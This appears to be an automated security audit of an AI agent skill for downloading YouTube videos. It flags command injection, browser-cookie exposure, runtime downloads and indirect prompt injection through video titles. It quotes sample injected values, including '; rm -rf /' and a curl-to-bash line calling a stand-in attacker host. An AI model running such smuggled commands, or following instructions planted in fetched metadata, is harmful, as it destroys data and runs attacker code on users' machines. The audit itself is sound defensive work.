youtube-download

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH (COMMAND_EXECUTION, CREDENTIALS_UNSAFE, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION)
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to build and execute shell commands using variables such as $VIDEO_URL, URL, and OUTPUT_PATH. These variables are interpolated directly into backticks or bash blocks (e.g., uvx yt-dlp ... "$VIDEO_URL"). Without strict sanitization, an attacker can provide a malicious URL containing shell metacharacters (e.g., ; rm -rf / or ; curl http://attacker.com | bash) to achieve arbitrary code execution on the host machine.
  • [CREDENTIALS_UNSAFE] (HIGH): The commands explicitly use the --cookies-from-browser chrome flag. This grants the yt-dlp process access to the user's entire Chrome profile, including active session tokens and authentication cookies for all logged-in websites. This is a severe privacy and data exposure risk.
  • [EXTERNAL_DOWNLOADS] (MEDIUM): The skill utilizes uvx to dynamically download and execute yt-dlp at runtime. While yt-dlp is a common tool, it is fetched from external repositories not included in the 'Trusted GitHub Organizations' list, representing an unverifiable dependency risk.
  • [DATA_EXFILTRATION] (MEDIUM): While no specific attacker-controlled exfiltration URL is hardcoded, the combination of reading sensitive browser credentials and having full network access (via yt-dlp and uvx) creates a high-risk path for automated data theft.
  • [PROMPT_INJECTION] (LOW): As the skill processes metadata from external websites (like video titles), it is susceptible to indirect prompt injection if those titles contain instructions that the LLM might mistakenly follow during the 'Show the user' or 'Build command' steps.
Recommendations
  • AI detected serious security threats
Audit Metadata
  • Risk Level: HIGH
  • Analyzed: Feb 17, 2026, 06:39 PM